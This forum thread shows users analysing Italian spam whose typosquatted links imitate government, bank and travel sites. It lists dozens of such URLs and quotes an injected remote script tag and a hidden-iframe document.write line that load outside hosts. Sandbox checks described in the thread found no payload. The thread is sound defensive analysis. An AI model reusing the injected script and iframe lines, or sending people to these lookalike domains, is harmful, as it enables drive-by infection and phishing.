Italian spam with suspicious link to malware

[Edgar Bangkok]

The last week I received several emails with the following text

Code: [Select]

Vbcinterfree Fatto pee compiacere hn
http://mininterrno.info

Code: [Select]

Bayoutoyouemail Che cotanto riescono incomldi alla società;
http://palazzochigii.com

Code: [Select]

Maddawgemail Servire Di Specchio A Qualche Femmina
Http://victorysolution.org

It is a spam hitting itallian users with different links in  mail
All the links is similar to legitimate sites IT

This is a list of active fake links in emails

Code: [Select]

    http://parlamentosenato.info
    http://allitallia.com/agenzia/roma/index.php
    http://mininterrno.info
    http://clubbviaggi.net/agenzia/roma/index07.php
    http://clubbviaggi.com/agenzia/roma/index1.php
    http://mininterrno.com
    http://easyinncontri.com/ultimaora/index.php
    http://easyinncontri.net/agenzia/roma/index07.php
    http://constriv.net/agenzia/roma/index.php
    http://esterii.com
    http://bancaditallia.com/agenzia/roma/index1.php
    http://bancaditallia.com/ultimaora/index11.php
    http://palazzochigii.com
    http://intessasanpaol.com/agenzia/roma/index11.php
    http://ultimaoranews.com/agenzia/roma/index11.php
    http://myedreams.net/agenzia/roma/index07.php
    http://ultimaoranews.com/ultimaora/index07.php
    http://intessasanpaol.com/ultimaora/index07.php
    http://bancosposta.it/ultimaora/index.php
    http://intessasanpaol.com/ultimaora/index2.php
    http://bancosposta.it/agenzia/roma/index1.php
    http://chattta.net/ultimaora/index.php
    http://3bbmeteo.com/ultimaora/index.php
    http://movimenti.info/ultimaora/index11.php
    http://bancodiposta.com/agenzia/roma/index.php
    http://zygnaa.com/agenzia/roma/index.php
    http://ultimaoranews.com/ultimaora/index1.php
    http://biigpoint.net/agenzia/roma/index07.php
    http://hoooligano.com/agenzia/roma/index11.php
    http://movimenti.info/agenzia/roma/index07.php
    http://intessasanpaol.com/ultimaora/index.php
    http://ultimaoranews.net/ultimaora/index2.php
    http://myedreams.com/agenzia/roma/index07.php
    http://ultimaoranews.com/agenzia/roma/index11.php
    http://intessasanpaol.com/ultimaora/index07.php
    http://bancosposta.it/ultimaora/index2.php
    http://bancodinapolli.com/ultimaora/index11.php
    http://easyinncontri.com/ultimaora/index.php
    http://allitallia.com/agenzia/roma/index07.php
All links is similar to legittimate links but changing a few letters in the link text

 THE structure spam mail seems to indicate links to malware

 Examining one of the many links

Code: [Select]

http://mininterrno.info
with

Code: [Select]

<script type="text/javascript" src="http://www.cool79.com.tw/images/process.js"></script>
and

Code: [Select]

document.write('<iframe src="http://clixchoi.com/t/8f14eea930749a9e2bbdcc785db4eb2a" width="2" height="3" frameborder="0"></iframe> ')
the suspicious site

Code: [Select]

"http://clixchoi.com/t/8f14eea930749a9e2bbdcc785db4eb2a"
with IP and whois

Code: [Select]

IP Information for 178.162.241.196
IP Location: Belize Belize Belmopan Leaseweb Germany Gmbh
ASN: AS28753
Resolve Host: hosted-by.leaseweb.com
IP Address: 178.162.241.196 [Whois] [Reverse-Ip] [Ping] [DNS Lookup] [Traceroute]
NetRange:       178.0.0.0 - 178.255.255.255
CIDR:           178.0.0.0/8

The

Code: [Select]

http://clixchoi.com/t/8f14eea930749a9e2bbdcc785db4eb2a
 site analysis with Wepawet,, Anubis etc. ..... dont show any type of malware even if the structure of spam suggests distributing malware

Any suggestions???

Regards

Edgar from Bangkok 

[dlipman]

It could be the site needs a referral from from a site in the chain and you only have one chance per IP.

[Edgar Bangkok]

I tried with different referrer, with different user agents,  with different IP (not Thai) but for the moment i not detect any malware ....
...........maybe need  'a mix of these sets ..........


Edgar

[dlipman]

Yeah, I tried using Malzilla with a Tor proxy with referrals as well as running 4 or 5 URLs in a SandBox.  I got nothing